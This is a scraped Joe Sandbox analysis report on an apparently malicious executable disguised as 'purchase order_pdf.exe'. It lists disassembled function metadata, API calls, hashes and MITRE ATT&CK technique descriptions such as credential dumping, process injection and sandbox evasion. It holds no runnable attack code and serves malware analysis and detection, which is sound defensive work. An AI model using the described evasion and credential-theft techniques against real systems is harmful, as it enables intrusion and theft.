Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 0a7896f989d7cb82a11e0139de4050ab2199d8fa995e06a83e65a722a3cc4326
Instruction ID: 0122f04437d5122e04f321a1576d4423ddc39214cf9cc658e90e32342f4e107e
Opcode Fuzzy Hash: 0a7896f989d7cb82a11e0139de4050ab2199d8fa995e06a83e65a722a3cc4326
Instruction Fuzzy Hash: 30211772610209AFDB04DFB8DD45AFA7BB8FB08354F104629FA55D3251E634E861DB60

Function 008F6B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 008F6C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008F6C20

Strings

edit, xrefs: 008F6BF5

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 47f58a5d68cb0fcee0a2970f8f9c5f0b312a6ab70ae7ef6604e9c5099d3f90db
Instruction ID: cd3c78355ac4e8314ec02848f5aa0f8e118c99384779931bfccc371ace371979
Opcode Fuzzy Hash: 47f58a5d68cb0fcee0a2970f8f9c5f0b312a6ab70ae7ef6604e9c5099d3f90db
Instruction Fuzzy Hash: 28116A7150020CABEB108F74DC45ABA3B69FF14378F604724FAA5D71E0E675DCA1AB60

Function 008D2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008D2F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008D2F30

Strings

0, xrefs: 008D2F07

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 74393d2e64d1ca2f6bcba15762d77bf84a2f0547516adbc51dbda0a8311a84c7
Instruction ID: 9e9510516f09a0d7bcbdc1b22c469bc5297d2008f8ee3338f9c3eaa5c42bf044
Opcode Fuzzy Hash: 74393d2e64d1ca2f6bcba15762d77bf84a2f0547516adbc51dbda0a8311a84c7
Instruction Fuzzy Hash: B111E631905118ABCB31DF98DC44B9973B9FB25314F0442A3E944F73A1DB70AD05CB91

Function 008E24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008E2520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008E2549

Strings

<local>, xrefs: 008E2511

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c08735652e3b2d89d8882e64a7b5d033751d51ae99ca69784a4714ab314af614
Instruction ID: 7f41214a62a23cb2c5f569c149f803e41fa0f341a486c265bf1807241f9d0ee6
Opcode Fuzzy Hash: c08735652e3b2d89d8882e64a7b5d033751d51ae99ca69784a4714ab314af614
Instruction Fuzzy Hash: AF11C2705016A5FADB249F628C99EBBFFACFF07755F10812AF90586040D2706991DAF0

Function 008E80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008E830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008E80C8,?,00000000,?,?), ref: 008E8322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008E80CB
htons.WSOCK32(00000000,?,00000000), ref: 008E8108

Strings

255.255.255.255, xrefs: 008E80E3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: bbc63d79e81fcc57be3890ecba6503c234b5273ed85dff930c1170e51f9452ea
Instruction ID: 755071c94be8e3f3881a151b086d0457d39ab5b5964aa052bff7c3c35c165851
Opcode Fuzzy Hash: bbc63d79e81fcc57be3890ecba6503c234b5273ed85dff930c1170e51f9452ea
Instruction Fuzzy Hash: 7411E534500249ABDB20AF69CC46FBDF374FF05320F10852AE915D7292DA71A811C692

Function 008C92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

Part of subcall function 008CB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008CB0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008C9355

Strings

ComboBox, xrefs: 008C92F4
ListBox, xrefs: 008C931F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 8952d04d359b9be81a59ba254aae611127a9012a01e5dc14ca0e48fed6bf1bf9
Instruction ID: b3a80e3f63be9d5224a11add9e5450e269b84338e81ef8cb018fe023886cadf0
Opcode Fuzzy Hash: 8952d04d359b9be81a59ba254aae611127a9012a01e5dc14ca0e48fed6bf1bf9
Instruction Fuzzy Hash: 7901C071A01228ABCB04AB68CC96DFEB779FF06320B100659F862972D5DB319808C651

Function 008C91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

Part of subcall function 008CB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008CB0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 008C924D

Strings

ComboBox, xrefs: 008C91EC
ListBox, xrefs: 008C9217

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 6b4cb155b390d72b43e08e20294c0e1a226ddb82f7802fa553b992ec5f954711
Instruction ID: 59b35fb053b65a9eb18cc0542535682912b9884096a4717f5401f50cda5c7f50
Opcode Fuzzy Hash: 6b4cb155b390d72b43e08e20294c0e1a226ddb82f7802fa553b992ec5f954711
Instruction Fuzzy Hash: 09018471A411187BCB04EBA4C996EFF73B8FF45300F240069B996E7285EE25DE08D662

Function 008C9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

Part of subcall function 008CB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008CB0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 008C92D0

Strings

ComboBox, xrefs: 008C9271
ListBox, xrefs: 008C929C

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c290cdc7be12cfca9cd59463c35732a293ca072fa85b7542be71304f604705f4
Instruction ID: 1202211256b3db9e1f5048c7058ae30b03ef8d5180c050fbe560aa1510ee7291
Opcode Fuzzy Hash: c290cdc7be12cfca9cd59463c35732a293ca072fa85b7542be71304f604705f4
Instruction Fuzzy Hash: E301A771A4111877CB04E6A4C986EFF77BCFF11300F244159B956E3186DA65DE08D272

Function 008D51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 008D51E8
_wcscmp.LIBCMT ref: 008D51FA

Strings

#32770, xrefs: 008D51F4

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 379779bb2fa36c1365fa08568b1fe6435ba4d24d52d8879c7246ecb971664ae2
Instruction ID: 35a47e105a6d5e3df5b5250132d3bfb387b0c0dc1e4f8ea0c56649e43c9a01ca
Opcode Fuzzy Hash: 379779bb2fa36c1365fa08568b1fe6435ba4d24d52d8879c7246ecb971664ae2
Instruction Fuzzy Hash: 55E02272A042286BE720AAE9AC49EA7F7ACFB40721F00016BF910D3040E6609A048BE1

Function 008C81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008C81CA

Part of subcall function 00893598: _doexit.LIBCMT ref: 008935A2

Strings

Error allocating memory., xrefs: 008C81C3
AutoIt, xrefs: 008C81BE

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 9106d486a2ffc265534ad72bb2699ee5b5f36fc4e9548aad9c6d15318b5021ef
Instruction ID: dc5688a6e81f1a0d3ce6406f65deb1d4b4d54f8374b222f496890e99f63efb44
Opcode Fuzzy Hash: 9106d486a2ffc265534ad72bb2699ee5b5f36fc4e9548aad9c6d15318b5021ef
Instruction Fuzzy Hash: E5D012322C532836D61432A86C0AFC575889B15B55F544016BB08D55D38ED69981829E

Function 008AB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008AB564: _memset.LIBCMT ref: 008AB571

Part of subcall function 00890B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008AB540,?,?,?,0087100A), ref: 00890B89

IsDebuggerPresent.KERNEL32(?,?,?,0087100A), ref: 008AB544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0087100A), ref: 008AB553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008AB54E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 1cff1b432c31ecfbbf33b0a38a68496beb342b7ec19fc54e29f88f5a9c1f8e0a
Instruction ID: b11e540cb2068db165cce8d29f582485498cdb117cfeb887861b66d6ac1c4818
Opcode Fuzzy Hash: 1cff1b432c31ecfbbf33b0a38a68496beb342b7ec19fc54e29f88f5a9c1f8e0a
Instruction Fuzzy Hash: A7E0C9706007158AE721EF68D5047527AE4FF05754F04892DE556C7652E7B4D444CB61

Function 008F5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008F5BF5
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008F5C08

Part of subcall function 008D54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008D555E

Strings

Shell_TrayWnd, xrefs: 008F5BEE

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 592ff41e61d3f0b1557e6e451728a624659ca7e1c4cc5f010d4fee54938305da
Instruction ID: 5081407a06f511af7af7239b7c330e3d0ef5b9e141849f32a7843580c9440d71
Opcode Fuzzy Hash: 592ff41e61d3f0b1557e6e451728a624659ca7e1c4cc5f010d4fee54938305da
Instruction Fuzzy Hash: 9CD0C932388311B7E774AB70AC0BFA76A14BF54B61F000826B755EA2D2D9E49840C655

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report purchase order_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

